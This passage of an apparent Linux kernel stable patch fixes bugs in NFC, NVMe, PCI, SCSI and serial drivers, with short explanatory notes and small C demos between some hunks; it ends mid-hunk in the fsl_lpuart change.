+--- a/drivers/nfc/st-nci/ndlc.c
++++ b/drivers/nfc/st-nci/ndlc.c
+@@ -282,13 +282,15 @@ EXPORT_SYMBOL(ndlc_probe);
+ 
+ void ndlc_remove(struct llt_ndlc *ndlc)
+ {
+-	st_nci_remove(ndlc->ndev);
+-
+ 	/* cancel timers */
+ 	del_timer_sync(&ndlc->t1_timer);
+ 	del_timer_sync(&ndlc->t2_timer);
+ 	ndlc->t2_active = false;
+ 	ndlc->t1_active = false;
++	/* cancel work */
++	cancel_work_sync(&ndlc->sm_work);
++
++	st_nci_remove(ndlc->ndev);
+ 
+ 	skb_queue_purge(&ndlc->rcv_q);
+ 	skb_queue_purge(&ndlc->send_q);
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index fbed8d1a02ef4..70b5e891f6b3b 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -781,16 +781,26 @@ static blk_status_t nvme_setup_discard(struct nvme_ns *ns, struct request *req,
+ 		range = page_address(ns->ctrl->discard_page);
+ 	}
+ 
+-	__rq_for_each_bio(bio, req) {
+-		u64 slba = nvme_sect_to_lba(ns, bio->bi_iter.bi_sector);
+-		u32 nlb = bio->bi_iter.bi_size >> ns->lba_shift;
+-
+-		if (n < segments) {
+-			range[n].cattr = cpu_to_le32(0);
+-			range[n].nlb = cpu_to_le32(nlb);
+-			range[n].slba = cpu_to_le64(slba);
++	if (queue_max_discard_segments(req->q) == 1) {
++		u64 slba = nvme_sect_to_lba(ns, blk_rq_pos(req));
++		u32 nlb = blk_rq_sectors(req) >> (ns->lba_shift - 9);
++
++		range[0].cattr = cpu_to_le32(0);
++		range[0].nlb = cpu_to_le32(nlb);
++		range[0].slba = cpu_to_le64(slba);
++		n = 1;
++	} else {
++		__rq_for_each_bio(bio, req) {
++			u64 slba = nvme_sect_to_lba(ns, bio->bi_iter.bi_sector);
++			u32 nlb = bio->bi_iter.bi_size >> ns->lba_shift;
++
++			if (n < segments) {
++				range[n].cattr = cpu_to_le32(0);
++				range[n].nlb = cpu_to_le32(nlb);
++				range[n].slba = cpu_to_le64(slba);
++			}
++			n++;
+ 		}
+-		n++;
+ 	}
+ 
+ 	if (WARN_ON_ONCE(n != segments)) {
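
When the queue advertises a single discard segment, the nvme hunk above describes the whole merged request with one range instead of walking bios; the sector count is converted to logical blocks by shifting with (lba_shift - 9), since blk_rq_sectors() counts 512-byte units. A worked example of that arithmetic (the 4 KiB LBA size is an assumption for the demo):

#include <stdint.h>
#include <stdio.h>

int main(void)
{
	unsigned int lba_shift = 12;	/* 4096-byte logical blocks, assumed */
	uint64_t rq_sectors = 2048;	/* one merged 1 MiB discard request */
	uint64_t nlb = rq_sectors >> (lba_shift - 9);

	printf("nlb=%llu\n", (unsigned long long)nlb);	/* 256 blocks */
	return 0;
}
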
+diff --git a/drivers/nvme/host/multipath.c b/drivers/nvme/host/multipath.c
+index fc39d01e7b63b..9171452e2f6d4 100644
+--- a/drivers/nvme/host/multipath.c
++++ b/drivers/nvme/host/multipath.c
+@@ -123,9 +123,8 @@ void nvme_mpath_start_request(struct request *rq)
+ 		return;
+ 
+ 	nvme_req(rq)->flags |= NVME_MPATH_IO_STATS;
+-	nvme_req(rq)->start_time = bdev_start_io_acct(disk->part0,
+-					blk_rq_bytes(rq) >> SECTOR_SHIFT,
+-					req_op(rq), jiffies);
++	nvme_req(rq)->start_time = bdev_start_io_acct(disk->part0, req_op(rq),
++						      jiffies);
+ }
+ EXPORT_SYMBOL_GPL(nvme_mpath_start_request);
+ 
+@@ -136,7 +135,8 @@ void nvme_mpath_end_request(struct request *rq)
+ 	if (!(nvme_req(rq)->flags & NVME_MPATH_IO_STATS))
+ 		return;
+ 	bdev_end_io_acct(ns->head->disk->part0, req_op(rq),
+-		nvme_req(rq)->start_time);
++			 blk_rq_bytes(rq) >> SECTOR_SHIFT,
++			 nvme_req(rq)->start_time);
+ }
+ 
+ void nvme_kick_requeue_lists(struct nvme_ctrl *ctrl)
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index c11e0cfeef0f3..29c902b9aecbd 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3468,6 +3468,8 @@ static const struct pci_device_id nvme_id_table[] = {
+ 		.driver_data = NVME_QUIRK_DISABLE_WRITE_ZEROES, },
+ 	{ PCI_DEVICE(0x2646, 0x501E),   /* KINGSTON OM3PGP4xxxxQ OS21011 NVMe SSD */
+ 		.driver_data = NVME_QUIRK_DISABLE_WRITE_ZEROES, },
++	{ PCI_DEVICE(0x1f40, 0x1202),   /* Netac Technologies Co. NV3000 NVMe SSD */
++		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x1f40, 0x5236),   /* Netac Technologies Co. NV7000 NVMe SSD */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x1e4B, 0x1001),   /* MAXIO MAP1001 */
+diff --git a/drivers/nvme/target/core.c b/drivers/nvme/target/core.c
+index f66ed13d7c11d..3935165048e74 100644
+--- a/drivers/nvme/target/core.c
++++ b/drivers/nvme/target/core.c
+@@ -756,8 +756,10 @@ static void __nvmet_req_complete(struct nvmet_req *req, u16 status)
+ 
+ void nvmet_req_complete(struct nvmet_req *req, u16 status)
+ {
++	struct nvmet_sq *sq = req->sq;
++
+ 	__nvmet_req_complete(req, status);
+-	percpu_ref_put(&req->sq->ref);
++	percpu_ref_put(&sq->ref);
+ }
+ EXPORT_SYMBOL_GPL(nvmet_req_complete);
+ 
+diff --git a/drivers/pci/bus.c b/drivers/pci/bus.c
+index 83ae838ceb5f0..549c4bd5caeca 100644
+--- a/drivers/pci/bus.c
++++ b/drivers/pci/bus.c
+@@ -76,6 +76,27 @@ struct resource *pci_bus_resource_n(const struct pci_bus *bus, int n)
+ }
+ EXPORT_SYMBOL_GPL(pci_bus_resource_n);
+ 
++void pci_bus_remove_resource(struct pci_bus *bus, struct resource *res)
++{
++	struct pci_bus_resource *bus_res, *tmp;
++	int i;
++
++	for (i = 0; i < PCI_BRIDGE_RESOURCE_NUM; i++) {
++		if (bus->resource[i] == res) {
++			bus->resource[i] = NULL;
++			return;
++		}
++	}
++
++	list_for_each_entry_safe(bus_res, tmp, &bus->resources, list) {
++		if (bus_res->res == res) {
++			list_del(&bus_res->list);
++			kfree(bus_res);
++			return;
++		}
++	}
++}
++
+ void pci_bus_remove_resources(struct pci_bus *bus)
+ {
+ 	int i;
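
pci_bus_remove_resource() above has to look in two places because a bus keeps its first windows in the fixed resource[] array and any overflow on the resources list. A miniature userspace analogue of that two-tier removal (strings stand in for struct resource, and an array models the list half purely for brevity):

#include <stdio.h>
#include <string.h>

#define SLOTS 4

static const char *slot[SLOTS];		/* fixed windows */
static const char *extra[8];		/* overflow windows */
static int nextra;

static void remove_res(const char *res)
{
	int i;

	for (i = 0; i < SLOTS; i++)
		if (slot[i] == res) {
			slot[i] = NULL;			/* fixed window: just clear */
			return;
		}
	for (i = 0; i < nextra; i++)
		if (extra[i] == res) {			/* overflow: unlink entry */
			memmove(&extra[i], &extra[i + 1],
				(nextra - i - 1) * sizeof(extra[0]));
			nextra--;
			return;
		}
}

int main(void)
{
	const char *win = "mem9";

	slot[0] = "mem0";
	extra[nextra++] = win;
	remove_res(win);
	printf("nextra=%d\n", nextra);			/* 0 */
	return 0;
}
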
+diff --git a/drivers/scsi/hosts.c b/drivers/scsi/hosts.c
+index 8e34bbf44d1f5..2bf8612fa55dd 100644
+--- a/drivers/scsi/hosts.c
++++ b/drivers/scsi/hosts.c
+@@ -341,9 +341,6 @@ static void scsi_host_dev_release(struct device *dev)
+ 	struct Scsi_Host *shost = dev_to_shost(dev);
+ 	struct device *parent = dev->parent;
+ 
+-	/* In case scsi_remove_host() has not been called. */
+-	scsi_proc_hostdir_rm(shost->hostt);
+-
+ 	/* Wait for functions invoked through call_rcu(&scmd->rcu, ...) */
+ 	rcu_barrier();
+ 
+diff --git a/drivers/scsi/mpi3mr/mpi3mr.h b/drivers/scsi/mpi3mr/mpi3mr.h
+index 8a438f248a820..de6914d57402c 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr.h
++++ b/drivers/scsi/mpi3mr/mpi3mr.h
+@@ -903,6 +903,7 @@ struct scmd_priv {
+  * @admin_reply_ephase:Admin reply queue expected phase
+  * @admin_reply_base: Admin reply queue base virtual address
+  * @admin_reply_dma: Admin reply queue base dma address
++ * @admin_reply_q_in_use: Queue is handled by poll/ISR
+  * @ready_timeout: Controller ready timeout
+  * @intr_info: Interrupt cookie pointer
+  * @intr_info_count: Number of interrupt cookies
+@@ -1056,6 +1057,7 @@ struct mpi3mr_ioc {
+ 	u8 admin_reply_ephase;
+ 	void *admin_reply_base;
+ 	dma_addr_t admin_reply_dma;
++	atomic_t admin_reply_q_in_use;
+ 
+ 	u32 ready_timeout;
+ 
+@@ -1391,4 +1393,7 @@ void mpi3mr_add_event_wait_for_device_refresh(struct mpi3mr_ioc *mrioc);
+ void mpi3mr_flush_drv_cmds(struct mpi3mr_ioc *mrioc);
+ void mpi3mr_flush_cmds_for_unrecovered_controller(struct mpi3mr_ioc *mrioc);
+ void mpi3mr_free_enclosure_list(struct mpi3mr_ioc *mrioc);
++int mpi3mr_process_admin_reply_q(struct mpi3mr_ioc *mrioc);
++void mpi3mr_expander_node_remove(struct mpi3mr_ioc *mrioc,
++	struct mpi3mr_sas_node *sas_expander);
+ #endif /*MPI3MR_H_INCLUDED*/
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_fw.c b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+index 758f7ca9e0ee8..28fd90c4b62d0 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_fw.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+@@ -415,7 +415,7 @@ out:
+ 		    le64_to_cpu(scsi_reply->sense_data_buffer_address));
+ }
+ 
+-static int mpi3mr_process_admin_reply_q(struct mpi3mr_ioc *mrioc)
++int mpi3mr_process_admin_reply_q(struct mpi3mr_ioc *mrioc)
+ {
+ 	u32 exp_phase = mrioc->admin_reply_ephase;
+ 	u32 admin_reply_ci = mrioc->admin_reply_ci;
+@@ -423,12 +423,17 @@ static int mpi3mr_process_admin_reply_q(struct mpi3mr_ioc *mrioc)
+ 	u64 reply_dma = 0;
+ 	struct mpi3_default_reply_descriptor *reply_desc;
+ 
++	if (!atomic_add_unless(&mrioc->admin_reply_q_in_use, 1, 1))
++		return 0;
++
+ 	reply_desc = (struct mpi3_default_reply_descriptor *)mrioc->admin_reply_base +
+ 	    admin_reply_ci;
+ 
+ 	if ((le16_to_cpu(reply_desc->reply_flags) &
+-	    MPI3_REPLY_DESCRIPT_FLAGS_PHASE_MASK) != exp_phase)
++	    MPI3_REPLY_DESCRIPT_FLAGS_PHASE_MASK) != exp_phase) {
++		atomic_dec(&mrioc->admin_reply_q_in_use);
+ 		return 0;
++	}
+ 
+ 	do {
+ 		if (mrioc->unrecoverable)
+@@ -454,6 +459,7 @@ static int mpi3mr_process_admin_reply_q(struct mpi3mr_ioc *mrioc)
+ 	writel(admin_reply_ci, &mrioc->sysif_regs->admin_reply_queue_ci);
+ 	mrioc->admin_reply_ci = admin_reply_ci;
+ 	mrioc->admin_reply_ephase = exp_phase;
++	atomic_dec(&mrioc->admin_reply_q_in_use);
+ 
+ 	return num_admin_replies;
+ }
+@@ -2605,6 +2611,7 @@ static int mpi3mr_setup_admin_qpair(struct mpi3mr_ioc *mrioc)
+ 	mrioc->admin_reply_ci = 0;
+ 	mrioc->admin_reply_ephase = 1;
+ 	mrioc->admin_reply_base = NULL;
++	atomic_set(&mrioc->admin_reply_q_in_use, 0);
+ 
+ 	if (!mrioc->admin_req_base) {
+ 		mrioc->admin_req_base = dma_alloc_coherent(&mrioc->pdev->dev,
+@@ -3813,27 +3820,34 @@ retry_init:
+ 
+ 	mpi3mr_print_ioc_info(mrioc);
+ 
+-	dprint_init(mrioc, "allocating config page buffers\n");
+-	mrioc->cfg_page = dma_alloc_coherent(&mrioc->pdev->dev,
+-	    MPI3MR_DEFAULT_CFG_PAGE_SZ, &mrioc->cfg_page_dma, GFP_KERNEL);
+-	if (!mrioc->cfg_page)
+-		goto out_failed_noretry;
+-
+-	mrioc->cfg_page_sz = MPI3MR_DEFAULT_CFG_PAGE_SZ;
++	if (!mrioc->cfg_page) {
++		dprint_init(mrioc, "allocating config page buffers\n");
++		mrioc->cfg_page_sz = MPI3MR_DEFAULT_CFG_PAGE_SZ;
++		mrioc->cfg_page = dma_alloc_coherent(&mrioc->pdev->dev,
++		    mrioc->cfg_page_sz, &mrioc->cfg_page_dma, GFP_KERNEL);
++		if (!mrioc->cfg_page) {
++			retval = -1;
++			goto out_failed_noretry;
++		}
++	}
+ 
+-	retval = mpi3mr_alloc_reply_sense_bufs(mrioc);
+-	if (retval) {
+-		ioc_err(mrioc,
+-		    "%s :Failed to allocated reply sense buffers %d\n",
+-		    __func__, retval);
+-		goto out_failed_noretry;
++	if (!mrioc->init_cmds.reply) {
++		retval = mpi3mr_alloc_reply_sense_bufs(mrioc);
++		if (retval) {
++			ioc_err(mrioc,
++			    "%s :Failed to allocate reply sense buffers %d\n",
++			    __func__, retval);
++			goto out_failed_noretry;
++		}
+ 	}
+ 
+-	retval = mpi3mr_alloc_chain_bufs(mrioc);
+-	if (retval) {
+-		ioc_err(mrioc, "Failed to allocated chain buffers %d\n",
+-		    retval);
+-		goto out_failed_noretry;
++	if (!mrioc->chain_sgl_list) {
++		retval = mpi3mr_alloc_chain_bufs(mrioc);
++		if (retval) {
++			ioc_err(mrioc, "Failed to allocate chain buffers %d\n",
++			    retval);
++			goto out_failed_noretry;
++		}
+ 	}
+ 
+ 	retval = mpi3mr_issue_iocinit(mrioc);
+@@ -3879,8 +3893,10 @@ retry_init:
+ 		dprint_init(mrioc, "allocating memory for throttle groups\n");
+ 		sz = sizeof(struct mpi3mr_throttle_group_info);
+ 		mrioc->throttle_groups = kcalloc(mrioc->num_io_throttle_group, sz, GFP_KERNEL);
+-		if (!mrioc->throttle_groups)
++		if (!mrioc->throttle_groups) {
++			retval = -1;
+ 			goto out_failed_noretry;
++		}
+ 	}
+ 
+ 	retval = mpi3mr_enable_events(mrioc);
+@@ -3900,6 +3916,7 @@ out_failed:
+ 		mpi3mr_memset_buffers(mrioc);
+ 		goto retry_init;
+ 	}
++	retval = -1;
+ out_failed_noretry:
+ 	ioc_err(mrioc, "controller initialization failed\n");
+ 	mpi3mr_issue_reset(mrioc, MPI3_SYSIF_HOST_DIAG_RESET_ACTION_DIAG_FAULT,
+@@ -4012,6 +4029,7 @@ retry_init:
+ 		ioc_err(mrioc,
+ 		    "cannot create minimum number of operational queues expected:%d created:%d\n",
+ 		    mrioc->shost->nr_hw_queues, mrioc->num_op_reply_q);
++		retval = -1;
+ 		goto out_failed_noretry;
+ 	}
+ 
+@@ -4078,6 +4096,7 @@ out_failed:
+ 		mpi3mr_memset_buffers(mrioc);
+ 		goto retry_init;
+ 	}
++	retval = -1;
+ out_failed_noretry:
+ 	ioc_err(mrioc, "controller %s is failed\n",
+ 	    (is_resume)?"resume":"re-initialization");
+@@ -4155,6 +4174,7 @@ void mpi3mr_memset_buffers(struct mpi3mr_ioc *mrioc)
+ 		memset(mrioc->admin_req_base, 0, mrioc->admin_req_q_sz);
+ 	if (mrioc->admin_reply_base)
+ 		memset(mrioc->admin_reply_base, 0, mrioc->admin_reply_q_sz);
++	atomic_set(&mrioc->admin_reply_q_in_use, 0);
+ 
+ 	if (mrioc->init_cmds.reply) {
+ 		memset(mrioc->init_cmds.reply, 0, sizeof(*mrioc->init_cmds.reply));
+@@ -4350,13 +4370,20 @@ void mpi3mr_free_mem(struct mpi3mr_ioc *mrioc)
+ 		    mrioc->admin_req_base, mrioc->admin_req_dma);
+ 		mrioc->admin_req_base = NULL;
+ 	}
+-
++	if (mrioc->cfg_page) {
++		dma_free_coherent(&mrioc->pdev->dev, mrioc->cfg_page_sz,
++		    mrioc->cfg_page, mrioc->cfg_page_dma);
++		mrioc->cfg_page = NULL;
++	}
+ 	if (mrioc->pel_seqnum_virt) {
+ 		dma_free_coherent(&mrioc->pdev->dev, mrioc->pel_seqnum_sz,
+ 		    mrioc->pel_seqnum_virt, mrioc->pel_seqnum_dma);
+ 		mrioc->pel_seqnum_virt = NULL;
+ 	}
+ 
++	kfree(mrioc->throttle_groups);
++	mrioc->throttle_groups = NULL;
++
+ 	kfree(mrioc->logdata_buf);
+ 	mrioc->logdata_buf = NULL;
+ 
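
A detail worth calling out in the mpi3mr_fw.c changes: atomic_add_unless(&..., 1, 1) only succeeds while the counter is not already 1, so it acts as a try-lock that lets exactly one context (IRQ handler or poller) drain the admin reply queue while late arrivals bail out. A C11 sketch of the same pattern (compare-and-swap is equivalent here because the counter only ever holds 0 or 1):

#include <stdatomic.h>
#include <stdio.h>

static atomic_int q_in_use;

static int try_enter(void)
{
	int expected = 0;

	/* like atomic_add_unless(&q_in_use, 1, 1) */
	return atomic_compare_exchange_strong(&q_in_use, &expected, 1);
}

static void leave(void)
{
	atomic_fetch_sub(&q_in_use, 1);		/* like atomic_dec() */
}

int main(void)
{
	int a = try_enter();
	int b = try_enter();

	printf("first=%d second=%d\n", a, b);	/* 1 0 */
	leave();
	printf("after leave=%d\n", try_enter());	/* 1 */
	return 0;
}
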
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_os.c b/drivers/scsi/mpi3mr/mpi3mr_os.c
+index 6eaeba41072cb..6d55698ea4d16 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_os.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_os.c
+@@ -3720,6 +3720,7 @@ int mpi3mr_issue_tm(struct mpi3mr_ioc *mrioc, u8 tm_type,
+ 		mpi3mr_poll_pend_io_completions(mrioc);
+ 		mpi3mr_ioc_enable_intr(mrioc);
+ 		mpi3mr_poll_pend_io_completions(mrioc);
++		mpi3mr_process_admin_reply_q(mrioc);
+ 	}
+ 	switch (tm_type) {
+ 	case MPI3_SCSITASKMGMT_TASKTYPE_TARGET_RESET:
+@@ -5077,6 +5078,8 @@ static void mpi3mr_remove(struct pci_dev *pdev)
+ 	struct workqueue_struct	*wq;
+ 	unsigned long flags;
+ 	struct mpi3mr_tgt_dev *tgtdev, *tgtdev_next;
++	struct mpi3mr_hba_port *port, *hba_port_next;
++	struct mpi3mr_sas_node *sas_expander, *sas_expander_next;
+ 
+ 	if (!shost)
+ 		return;
+@@ -5116,6 +5119,28 @@ static void mpi3mr_remove(struct pci_dev *pdev)
+ 	mpi3mr_free_mem(mrioc);
+ 	mpi3mr_cleanup_resources(mrioc);
+ 
++	spin_lock_irqsave(&mrioc->sas_node_lock, flags);
++	list_for_each_entry_safe_reverse(sas_expander, sas_expander_next,
++	    &mrioc->sas_expander_list, list) {
++		spin_unlock_irqrestore(&mrioc->sas_node_lock, flags);
++		mpi3mr_expander_node_remove(mrioc, sas_expander);
++		spin_lock_irqsave(&mrioc->sas_node_lock, flags);
++	}
++	list_for_each_entry_safe(port, hba_port_next, &mrioc->hba_port_table_list, list) {
++		ioc_info(mrioc,
++		    "removing hba_port entry: %p port: %d from hba_port list\n",
++		    port, port->port_id);
++		list_del(&port->list);
++		kfree(port);
++	}
++	spin_unlock_irqrestore(&mrioc->sas_node_lock, flags);
++
++	if (mrioc->sas_hba.num_phys) {
++		kfree(mrioc->sas_hba.phy);
++		mrioc->sas_hba.phy = NULL;
++		mrioc->sas_hba.num_phys = 0;
++	}
++
+ 	spin_lock(&mrioc_list_lock);
+ 	list_del(&mrioc->list);
+ 	spin_unlock(&mrioc_list_lock);
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_transport.c b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+index 3b61815979dab..50263ba4f8428 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_transport.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+@@ -9,9 +9,6 @@
+ 
+ #include "mpi3mr.h"
+ 
+-static void mpi3mr_expander_node_remove(struct mpi3mr_ioc *mrioc,
+-	struct mpi3mr_sas_node *sas_expander);
+-
+ /**
+  * mpi3mr_post_transport_req - Issue transport requests and wait
+  * @mrioc: Adapter instance reference
+@@ -2163,7 +2160,7 @@ out_fail:
+  *
+  * Return nothing.
+  */
+-static void mpi3mr_expander_node_remove(struct mpi3mr_ioc *mrioc,
++void mpi3mr_expander_node_remove(struct mpi3mr_ioc *mrioc,
+ 	struct mpi3mr_sas_node *sas_expander)
+ {
+ 	struct mpi3mr_sas_port *mr_sas_port, *next;
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_transport.c b/drivers/scsi/mpt3sas/mpt3sas_transport.c
+index e5ecd6ada6cdd..e8a4750f6ec47 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_transport.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_transport.c
+@@ -785,7 +785,7 @@ mpt3sas_transport_port_add(struct MPT3SAS_ADAPTER *ioc, u16 handle,
+ 		goto out_fail;
+ 	}
+ 	port = sas_port_alloc_num(sas_node->parent_dev);
+-	if ((sas_port_add(port))) {
++	if (!port || (sas_port_add(port))) {
+ 		ioc_err(ioc, "failure at %s:%d/%s()!\n",
+ 			__FILE__, __LINE__, __func__);
+ 		goto out_fail;
+@@ -824,6 +824,12 @@ mpt3sas_transport_port_add(struct MPT3SAS_ADAPTER *ioc, u16 handle,
+ 			    mpt3sas_port->remote_identify.sas_address;
+ 	}
+ 
++	if (!rphy) {
++		ioc_err(ioc, "failure at %s:%d/%s()!\n",
++			__FILE__, __LINE__, __func__);
++		goto out_delete_port;
++	}
++
+ 	rphy->identify = mpt3sas_port->remote_identify;
+ 
+ 	if ((sas_rphy_add(rphy))) {
+@@ -831,6 +837,7 @@ mpt3sas_transport_port_add(struct MPT3SAS_ADAPTER *ioc, u16 handle,
+ 			__FILE__, __LINE__, __func__);
+ 		sas_rphy_free(rphy);
+ 		rphy = NULL;
++		goto out_delete_port;
+ 	}
+ 
+ 	if (mpt3sas_port->remote_identify.device_type == SAS_END_DEVICE) {
+@@ -857,7 +864,10 @@ mpt3sas_transport_port_add(struct MPT3SAS_ADAPTER *ioc, u16 handle,
+ 		    rphy_to_expander_device(rphy), hba_port->port_id);
+ 	return mpt3sas_port;
+ 
+- out_fail:
++out_delete_port:
++	sas_port_delete(port);
++
++out_fail:
+ 	list_for_each_entry_safe(mpt3sas_phy, next, &mpt3sas_port->phy_list,
+ 	    port_siblings)
+ 		list_del(&mpt3sas_phy->port_siblings);
+diff --git a/drivers/scsi/scsi.c b/drivers/scsi/scsi.c
+index 9feb0323bc44a..dff1d692e756a 100644
+--- a/drivers/scsi/scsi.c
++++ b/drivers/scsi/scsi.c
+@@ -326,6 +326,9 @@ static int scsi_get_vpd_size(struct scsi_device *sdev, u8 page)
+ 	unsigned char vpd_header[SCSI_VPD_HEADER_SIZE] __aligned(4);
+ 	int result;
+ 
++	if (sdev->no_vpd_size)
++		return SCSI_DEFAULT_VPD_LEN;
++
+ 	/*
+ 	 * Fetch the VPD page header to find out how big the page
+ 	 * is. This is done to prevent problems on legacy devices
+diff --git a/drivers/scsi/scsi_devinfo.c b/drivers/scsi/scsi_devinfo.c
+index c7080454aea99..bc9d280417f6a 100644
+--- a/drivers/scsi/scsi_devinfo.c
++++ b/drivers/scsi/scsi_devinfo.c
+@@ -134,7 +134,7 @@ static struct {
+ 	{"3PARdata", "VV", NULL, BLIST_REPORTLUN2},
+ 	{"ADAPTEC", "AACRAID", NULL, BLIST_FORCELUN},
+ 	{"ADAPTEC", "Adaptec 5400S", NULL, BLIST_FORCELUN},
+-	{"AIX", "VDASD", NULL, BLIST_TRY_VPD_PAGES},
++	{"AIX", "VDASD", NULL, BLIST_TRY_VPD_PAGES | BLIST_NO_VPD_SIZE},
+ 	{"AFT PRO", "-IX CF", "0.0>", BLIST_FORCELUN},
+ 	{"BELKIN", "USB 2 HS-CF", "1.95",  BLIST_FORCELUN | BLIST_INQUIRY_36},
+ 	{"BROWNIE", "1200U3P", NULL, BLIST_NOREPORTLUN},
+@@ -188,6 +188,7 @@ static struct {
+ 	{"HPE", "OPEN-", "*", BLIST_REPORTLUN2 | BLIST_TRY_VPD_PAGES},
+ 	{"IBM", "AuSaV1S2", NULL, BLIST_FORCELUN},
+ 	{"IBM", "ProFibre 4000R", "*", BLIST_SPARSELUN | BLIST_LARGELUN},
++	{"IBM", "2076", NULL, BLIST_NO_VPD_SIZE},
+ 	{"IBM", "2105", NULL, BLIST_RETRY_HWERROR},
+ 	{"iomega", "jaz 1GB", "J.86", BLIST_NOTQ | BLIST_NOLUN},
+ 	{"IOMEGA", "ZIP", NULL, BLIST_NOTQ | BLIST_NOLUN},
+diff --git a/drivers/scsi/scsi_scan.c b/drivers/scsi/scsi_scan.c
+index f9b18fdc7b3c8..6042a5587bc37 100644
+--- a/drivers/scsi/scsi_scan.c
++++ b/drivers/scsi/scsi_scan.c
+@@ -1055,6 +1055,9 @@ static int scsi_add_lun(struct scsi_device *sdev, unsigned char *inq_result,
+ 	else if (*bflags & BLIST_SKIP_VPD_PAGES)
+ 		sdev->skip_vpd_pages = 1;
+ 
++	if (*bflags & BLIST_NO_VPD_SIZE)
++		sdev->no_vpd_size = 1;
++
+ 	transport_configure_device(&sdev->sdev_gendev);
+ 
+ 	if (sdev->host->hostt->slave_configure) {
+diff --git a/drivers/tty/serial/8250/8250_em.c b/drivers/tty/serial/8250/8250_em.c
+index f8e99995eee91..d94c3811a8f7a 100644
+--- a/drivers/tty/serial/8250/8250_em.c
++++ b/drivers/tty/serial/8250/8250_em.c
+@@ -106,8 +106,8 @@ static int serial8250_em_probe(struct platform_device *pdev)
+ 	memset(&up, 0, sizeof(up));
+ 	up.port.mapbase = regs->start;
+ 	up.port.irq = irq;
+-	up.port.type = PORT_UNKNOWN;
+-	up.port.flags = UPF_BOOT_AUTOCONF | UPF_FIXED_PORT | UPF_IOREMAP;
++	up.port.type = PORT_16750;
++	up.port.flags = UPF_FIXED_PORT | UPF_IOREMAP | UPF_FIXED_TYPE;
+ 	up.port.dev = &pdev->dev;
+ 	up.port.private_data = priv;
+ 
+diff --git a/drivers/tty/serial/8250/8250_fsl.c b/drivers/tty/serial/8250/8250_fsl.c
+index 8aad15622a2e5..8adfaa183f778 100644
+--- a/drivers/tty/serial/8250/8250_fsl.c
++++ b/drivers/tty/serial/8250/8250_fsl.c
+@@ -34,7 +34,7 @@ int fsl8250_handle_irq(struct uart_port *port)
+ 
+ 	iir = port->serial_in(port, UART_IIR);
+ 	if (iir & UART_IIR_NO_INT) {
+-		spin_unlock(&up->port.lock);
++		spin_unlock_irqrestore(&up->port.lock, flags);
+ 		return 0;
+ 	}
+ 
+@@ -42,7 +42,7 @@ int fsl8250_handle_irq(struct uart_port *port)
+ 	if (unlikely(up->lsr_saved_flags & UART_LSR_BI)) {
+ 		up->lsr_saved_flags &= ~UART_LSR_BI;
+ 		port->serial_in(port, UART_RX);
+-		spin_unlock(&up->port.lock);
++		spin_unlock_irqrestore(&up->port.lock, flags);
+ 		return 1;
+ 	}
+ 
+diff --git a/drivers/tty/serial/8250/Kconfig b/drivers/tty/serial/8250/Kconfig
+index b0f62345bc846..583a340f99345 100644
+--- a/drivers/tty/serial/8250/Kconfig
++++ b/drivers/tty/serial/8250/Kconfig
+@@ -253,8 +253,9 @@ config SERIAL_8250_ASPEED_VUART
+ 	tristate "Aspeed Virtual UART"
+ 	depends on SERIAL_8250
+ 	depends on OF
+-	depends on REGMAP && MFD_SYSCON
++	depends on MFD_SYSCON
+ 	depends on ARCH_ASPEED || COMPILE_TEST
++	select REGMAP
+ 	help
+ 	  If you want to use the virtual UART (VUART) device on Aspeed
+ 	  BMC platforms, enable this option. This enables the 16550A-
+diff --git a/drivers/tty/serial/Kconfig b/drivers/tty/serial/Kconfig
+index c55b947f3cdbb..8cbf73f86059a 100644
+--- a/drivers/tty/serial/Kconfig
++++ b/drivers/tty/serial/Kconfig
+@@ -1313,7 +1313,7 @@ config SERIAL_FSL_LPUART
+ 
+ config SERIAL_FSL_LPUART_CONSOLE
+ 	bool "Console on Freescale lpuart serial port"
+-	depends on SERIAL_FSL_LPUART
++	depends on SERIAL_FSL_LPUART=y
+ 	select SERIAL_CORE_CONSOLE
+ 	select SERIAL_EARLYCON
+ 	help
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index b136c596fe6ae..812216b24db81 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -1328,6 +1328,7 @@ static void lpuart_dma_rx_free(struct uart_port *port)
+ 	struct dma_chan *chan = sport->dma_rx_chan;
+ 
+ 	dmaengine_terminate_sync(chan);
++	del_timer_sync(&sport->lpuart_timer);
+ 	dma_unmap_sg(chan->device->dev, &sport->rx_sgl, 1, DMA_FROM_DEVICE);
+ 	kfree(sport->rx_ring.buf);
+ 	sport->rx_ring.tail = 0;
+@@ -1762,7 +1763,6 @@ static int lpuart32_startup(struct uart_port *port)
+ static void lpuart_dma_shutdown(struct lpuart_port *sport)
+ {
+ 	if (sport->lpuart_dma_rx_use) {
+-		del_timer_sync(&sport->lpuart_timer);
+ 		lpuart_dma_rx_free(&sport->port);
+ 		sport->lpuart_dma_rx_use = false;
+ 	}
+@@ -1922,10 +1922,8 @@ lpuart_set_termios(struct uart_port *port, struct ktermios *termios,
+ 	 * Since the timer function acquires sport->port.lock, stop it before
+ 	 * acquiring the same lock because otherwise del_timer_sync() can deadlock.
+ 	 */
